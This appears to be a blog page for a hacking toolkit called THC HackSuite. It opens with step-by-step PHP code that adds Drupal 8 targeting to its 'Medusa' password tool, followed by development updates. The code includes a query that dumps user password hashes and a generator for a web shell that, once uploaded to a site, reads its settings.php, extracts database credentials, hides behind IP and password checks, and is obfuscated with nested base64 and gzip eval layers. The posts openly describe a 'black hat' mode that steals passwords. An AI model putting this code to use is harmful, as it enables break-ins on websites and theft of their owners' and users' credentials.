Drupal 8 support for THC Medusa

Step 1:

Save the data below as /forums/drupal/drupalc.php

<?php

class Crypt {

public static function randomBytes($count) {

return random_bytes($count);

}

public static function hmacBase64($data, $key) {

if (!is_scalar($data) || !is_scalar($key)) {

throw new \InvalidArgumentException('Both parameters passed to \Drupal\Component\Utility\Crypt::hmacBase64 must be scalar values.');

}

$hmac = base64_encode(hash_hmac('sha256', $data, $key, TRUE));

return str_replace(['+', '/', '='], ['-', '_', ''], $hmac);

}

public static function hashBase64($data) {

$hash = base64_encode(hash('sha256', $data, TRUE));

return str_replace(['+', '/', '='], ['-', '_', ''], $hash);

}

public static function hashEquals($known_string, $user_string) {

if (function_exists('hash_equals')) {

return hash_equals($known_string, $user_string);

}

else {

if (!is_string($known_string)) {

trigger_error(sprintf("Expected known_string to be a string, %s given", gettype($known_string)), E_USER_WARNING);

return FALSE;

}

if (!is_string($user_string)) {

trigger_error(sprintf("Expected user_string to be a string, %s given", gettype($user_string)), E_USER_WARNING);

return FALSE;

}

$known_len = strlen($known_string);

if ($known_len !== strlen($user_string)) {

return FALSE;

}

$result = 0;

for ($i = 0; $i < $known_len; $i++) {

$result |= (ord($known_string[$i]) ^ ord($user_string[$i]));

}

return $result === 0;

}

}

public static function randomBytesBase64($count = 32) {

return str_replace(['+', '/', '='], ['-', '_', ''], base64_encode(static::randomBytes($count)));

}

}

class PhpassHashedPassword implements PasswordInterface {

const MIN_HASH_COUNT = 7;

const MAX_HASH_COUNT = 30;

const HASH_LENGTH = 55;

public static $ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

protected $countLog2;

function __construct($countLog2) {

$this->countLog2 = $this->enforceLog2Boundaries($countLog2);

}

protected function base64Encode($input, $count) {

$output = '';

$i = 0;

do {

$value = ord($input[$i++]);

$output .= static::$ITOA64[$value & 0x3f];

if ($i < $count) {

$value |= ord($input[$i]) << 8;

}

$output .= static::$ITOA64[($value >> 6) & 0x3f];

if ($i++ >= $count) {

break;

}

if ($i < $count) {

$value |= ord($input[$i]) << 16;

}

$output .= static::$ITOA64[($value >> 12) & 0x3f];

if ($i++ >= $count) {

break;

}

$output .= static::$ITOA64[($value >> 18) & 0x3f];

} while ($i < $count);

return $output;

}

protected function generateSalt() {

$output = '$S$';

$output .= static::$ITOA64[$this->countLog2];

$output .= $this->base64Encode(Crypt::randomBytes(6), 6);

return $output;

}

protected function enforceLog2Boundaries($count_log2) {

if ($count_log2 < static::MIN_HASH_COUNT) {

return static::MIN_HASH_COUNT;

}

elseif ($count_log2 > static::MAX_HASH_COUNT) {

return static::MAX_HASH_COUNT;

}

return (int) $count_log2;

}

protected function crypt($algo, $password, $setting) {

if (strlen($password) > PasswordInterface::PASSWORD_MAX_LENGTH) {

return FALSE;

}

$setting = substr($setting, 0, 12);

if ($setting[0] != '$' || $setting[2] != '$') {

return FALSE;

}

$count_log2 = $this->getCountLog2($setting);

if ($count_log2 != $this->enforceLog2Boundaries($count_log2)) {

return FALSE;

}

$salt = substr($setting, 4, 8);

if (strlen($salt) != 8) {

return FALSE;

}

$count = 1 << $count_log2;

$hash = hash($algo, $salt . $password, TRUE);

do {

$hash = hash($algo, $hash . $password, TRUE);

} while (--$count);

$len = strlen($hash);

$output = $setting . $this->base64Encode($hash, $len);

$expected = 12 + ceil((8 * $len) / 6);

return (strlen($output) == $expected) ? substr($output, 0, static::HASH_LENGTH) : FALSE;

}

public function getCountLog2($setting) {

return strpos(static::$ITOA64, $setting[3]);

}

public function hash($password) {

return $this->crypt('sha512', $password, $this->generateSalt());

}

public function check($password, $hash) {

if (substr($hash, 0, 2) == 'U$') {

$stored_hash = substr($hash, 1);

$password = md5($password);

}

else {

$stored_hash = $hash;

}

$type = substr($stored_hash, 0, 3);

switch ($type) {

case '$S$':

// A normal Drupal 7 password using sha512.

$computed_hash = $this->crypt('sha512', $password, $stored_hash);

break;

case '$H$':

// phpBB3 uses "$H$" for the same thing as "$P$".

case '$P$':

// A phpass password generated using md5. This is an

// imported password or from an earlier Drupal version.

$computed_hash = $this->crypt('md5', $password, $stored_hash);

break;

default:

return FALSE;

}

return $computed_hash && Crypt::hashEquals($stored_hash, $computed_hash);

}

}

interface PasswordInterface {

const PASSWORD_MAX_LENGTH = 512;

public function hash($password);

public function check($password, $hash);

}

/* Drupal */

$_PROPERTIES = array();

$_PROPERTIES['name'] = "Drupal8";

$_PROPERTIES['version'] = "8.x";

$_PROPERTIES['usernamefield'] = "name";

$_PROPERTIES['emailfield'] = "mail";

$_PROPERTIES['hashfield'] = "pass";

$_PROPERTIES['tablename'] = "users_field_data";

$_PROPERTIES['tableprefix'] = "drli_";

$_PROPERTIES['filename'] = "drupal/drupalc.php";

// use post variables instead if values are different from default

if(isset($_POST['iUseDefault']) && $_POST['iUseDefault']==0){

$_PROPERTIES['usernamefield'] = @mysql_real_escape_string($_POST['sUserNameField']);

$_PROPERTIES['emailfield'] = @mysql_real_escape_string($_POST['sEmailField']);

$_PROPERTIES['hashfield'] = @mysql_real_escape_string($_POST['sHashField']);

$_PROPERTIES['tablename'] = @mysql_real_escape_string($_POST['sTableName']);

$_PROPERTIES['tableprefix'] = @mysql_real_escape_string($_POST['sTablePrefix']);

}

$_PROPERTIES['queryraw'] = array();

$_PROPERTIES['queryraw']['attack'] = "SELECT ".$_PROPERTIES['usernamefield']." AS crackuser,".$_PROPERTIES['hashfield']." AS crackpass".(isset($_PROPERTIES['saltfield']) ? ",".$_PROPERTIES['saltfield']." AS crackhash" : "")." FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."<>''";

$_PROPERTIES['queryraw']['getemail'] = "SELECT ".$_PROPERTIES['emailfield']." AS temail FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."='/user/'";

if(isset($_GET['JSON'])){

session_cache_limiter('nocache');

header('Expires: '.gmdate('r',0));

header('Content-type: application/json');

echo json_encode($_PROPERTIES);

}

$_SYSTEM = array();

$_SYSTEM['name'] = $_PROPERTIES['name'];

$_SYSTEM['version'] = $_PROPERTIES['version'];

$_SYSTEM['patterns'] = array();

$_SYSTEM['patterns']['user'] = '/\'username\'\s+=>\s+\'(.*)?\'/';

$_SYSTEM['patterns']['password'] = '/\'password\'\s+=>\s+\'(.*)?\'/';

$_SYSTEM['patterns']['host'] = '/\'host\'\s+=>\s+\'(.*)?\'/';

$_SYSTEM['patterns']['database'] = '/\'database\'\s+=>\s+\'(.*)?\'/';

$_SYSTEM['patterns']['prefix'] = '/\'prefix\'\s+=>\s+\'(.*)?\'/';

$_SYSTEM['patterns']['salt'] = '/\$settings[\'hash_salt\']\s+=\s+\'.*\'/';

$_SYSTEM['file'] = "sites/default/settings.php";

?>

step 2:

Replace the MedusaShell function in crackmeclass.php with:

/* creates a medusa shell */

function MedusaShell($aSystem,$aOptions){

$sShell = "set_time_limit(0);\n";

$sTemplate = "";

if(isset($aOptions['ip'])){

// ip protection

$sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";

$sShell .= " header(\"Location: http://www.google.com\");\n";

$sShell .= " exit;\n";

$sShell .= "}\n";

}

if(isset($aOptions['pass'])){

// password protection

$sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";

$sShell .= " echo'<html>\n";

$sShell .= " <head></head>\n";

$sShell .= " <body>\n";

$sShell .= " <form method=\"post\">\n";

$sShell .= " <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";

$sShell .= " </form>\n";

$sShell .= " </body>\n";

$sShell .= " </html>';\n";

$sShell .= " exit;\n";

$sShell .= "}\n";

}

// create shell based on system array

$sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";

$sShell .= "foreach(\$iterator as \$path){\n";

$sShell .= " if(!\$path->isDir()){\n";

$sShell .= " \$sPath = \$path->__toString();\n";

$sShell .= " \$sFile = \"".$aSystem['file']."\";\n";

$sShell .= " if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";

$sShell .= " \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";

$sShell .= " }\n";

$sShell .= " if(strpos(\$sPath,\$sFile)!==false){\n";

$sShell .= " \$sData = file_get_contents(\$sPath);\n";

$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";

$sShell .= " if(!isset(\$aUser[1])){\n";

$sShell .= " continue;\n";

$sShell .= " }\n";

$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";

$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";

$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";

$sShell .= " if(isset(\$aSystem['patterns']['salt'])){\n";

$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['salt'])."',\$sData,\$aSalt);\n";

$sShell .= " }\n";

$sShell .= " if(isset(\$aSystem['patterns']['prefix'])){\n";

$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['prefix'])."',\$sData,\$aPrefix);\n";

$sShell .= " }\n";

$sShell .= " \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";

$sShell .= " \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";

$sShell .= " \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";

$sShell .= " \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";

$sShell .= " if(isset(\$aSystem['patterns']['prefix'])){\n";

$sShell .= " \$sResult .= \"<b>prefix:</b> \".\$aPrefix[1].\"<br />\";\n";

$sShell .= " }\n";

$sShell .= " if(isset(\$aSystem['patterns']['salt'])){\n";

$sShell .= " \$sResult .= \"<b>hash:</b> \".\$aSalt[1].\"<br />\";\n";

$sShell .= " }\n";

$sShell .= " die(\$sResult);\n";

$sShell .= " }\n";

$sShell .= " }\n";

$sShell .= "}\n";

$sShell .= "die(\"Failed to get login information.\");\n";

if(isset($aOptions['encrypt'])){

// source protection

if($aOptions['encrypt']=="normal"){

$sShell = "eval(base64_decode('".base64_encode($sShell)."'));\n";

}

else{

$sEncoder = "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";

$sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";

$sEncoder .= "\$aF = array();\n";

$sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval

$sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev

$sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate

$sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate

$sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode

$sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode

$sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress

$sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress

// encode and decode functions

$_ENCODE = array();

$_ENCODE[0] = array(7,"gzcompress");

$_ENCODE[1] = array(4,"base64_encode");

$_DECODE = array();

$_DECODE[0] = array(6,"gzuncompress");

$_DECODE[1] = array(5,"base64_decode");

// good luck decrypting the shell :p

$iEncryptions = count($_ENCODE)-1;

$iEncryptionLoops = mt_rand(120,150);

for($x=0;$x<$iEncryptionLoops;$x++){

$iEncryption = mt_rand(0,$iEncryptions);

$sShell = "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";

}

$sShell = $sEncoder.$sShell.";";

}

}

if(isset($aOptions['shellcreate'])){

// save source

return($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));

}

else{

$sShell = str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");

return($sShell);

}

}

step 3:

Add this to the UserLogin function:

case"Drupal8":

$cDrupal8 = new PhpassHashedPassword();

return($cDrupal8->check($sPass,$sHash) ? true : false);

break;

Progress on HackSuite 0.6

Good news for people who can't wait for the latest version of the HackSuite! I've done a huge amount of work on the program. I'm really excited to say that I might just be ready for launch in a couple of months if I keep up with the same amount of progress like in the last month.

After I'm finished I'll put more time into the documentation and how-to's to make sure you can get the most out of this versatile penetration testing cms.

THC HackSuite 0.6

It's been a long time since I did anything else but sharpening my 3D skills. Late 2014 I thought it was time to make a major update for the THC HackSuite CMS. When I created 0.5 I had in mind to stop the development because I was tired of programming.

Well...I'm back and have major plans for the HackSuite! First of all I'm going to drop stuff like bruteforcers for popular websites and other meaningless crap. Instead I want to increase usability rather than spitting out lots of compatible apps and modules.

Expected release will be around half 2015 as I have lots of features planned.

Integration of medusa into the HackSuite

I have just created the database manager for THC Medusa and thought I'd share what I did so far on this new Application. As you can see in the image below the Medusa app is split into two apps. The white hat and the black hat version.

For now I need to integrate the rest of the application so that it can communicate with the suite because I started with this project as being standalone.

Anyway here's a sneak peek.

New stuff I'm working on

Been some time since I updated the blog. For now I'm working on the pro version of the hacksuite. As you may know or not know I've stopped working on the free version of the hacksuite.

As we speak I'm integrating the medusa tool that I created earlier into the hacksuite, it's a complete suite that is used for finding weak passwords in cmses and forums. It can be used for whitehat and blackhat purposes. In white hat modus it will send a warning to users, in black hat style it steals passwords.
It can however do way more. I'm planning on creating a shell that can steal configuration files from cmses and forums. This together will make a deadly tool that can start stealing passwords within minutes if the site has a file upload vulnerability.

Medusa already supports around 20 of the most used cmeses and forums and adding new targets is easy with the supplied documentation.

New site online

THC HackSuite has a new website online! Hope you will like it. :)

Dominator new files and features so far

There's actually a lot more features, but I'm a coder and hate to update the changelog, here's a list though of what I've done so far:

NEWLY ADDED:

vars.php
// 0.5 - restricted password access to the suite?
$_CONTEXT['pass_access'] = false;
// 0.5 - pass hash
$_CONTEXT['pass_hash'] = 0;
// 0.5 - pass salt
$_CONTEXT['pass_salt'] = 0;
// 0.5 - sleep after failure in seconds
$_CONTEXT['sleeptime'] = 3;
// 0.5 - login file
$_CONTEXT['login_file'] = "login.php";
// 0.5 - redirect login failure
$_CONTEXT['redirect_fail_login'] = "http://www.google.com";
// 0.5 - allow remote rss feeds
$_CONTEXT['allow_remote_locations'] = true;
// 0.5 - used for automatic category filtering
$_CONTEXT['modcats'] = array();

// new files
- setup.php
- login.php
- auth.php
- json/login.php
- json/setup.php
- style/setup.php
- style/login.php
- style/headlogin.php
- style/bodylogin.php
- style/bodysetup.php
- style/css/login.css
- style/css/dominator.css
- style/js/login.js
- data/body.php
- data/remote.php
- includes/modset.php
- includes/sources.php
- includes/security.php
- includes/main_body_start.php
- includes/main_body_end.php
- rss/twitter.php
- rss/hsupdate.php

// new features
* updated jquery to 1.9.1
* login and setup
* paths.php new paths
* cleaned up js files
* removed caching (from rss class)